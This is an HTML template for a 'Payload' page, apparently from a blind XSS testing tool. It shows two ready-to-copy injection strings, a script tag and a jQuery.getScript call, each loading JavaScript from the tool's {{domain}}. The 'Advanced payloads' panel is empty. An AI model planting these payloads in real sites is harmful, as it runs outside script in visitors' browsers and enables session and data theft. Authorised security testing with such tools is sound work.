<div class="wrapper">

  {{menu}}

  <section class="content">
      <div class="container-fluid">
        <div class="row">
          <div class="col-lg-12">
            <div class="view-header">
              <div class="header-icon"><i class="fa fa-fire"> </i></div>
              <div class="header-title">
                <h3 class="m-b-xs">Payload</h3>
                <small>Get a payload</small>
              </div>
            </div>
            <hr>
          </div>
        </div>

        <div class="row">

          <div class="col-lg-6">
            <div class="panel panel-filled">
              <div class="panel-heading">Simple payloads</div>
              <div class="panel-body">
                <div class="form-group">
                  <label class="control-label">Script src</label>
                  <input value='<script src=//{{domain}}></script>' disabled class="form-control"><br>
                  
                  <label class="control-label">jQuery</label>
                  <input value='jQuery.getScript("//{{domain}}")' disabled class="form-control">
                </div>
              </div>
            </div>
          </div>

          <div class="col-lg-6">
            <div class="panel panel-filled">
              <div class="panel-heading">Advanced payloads</div>
              <div class="panel-body">

              </div>
            </div>
          </div>

        </div>

      </div>
  </section>
</div>
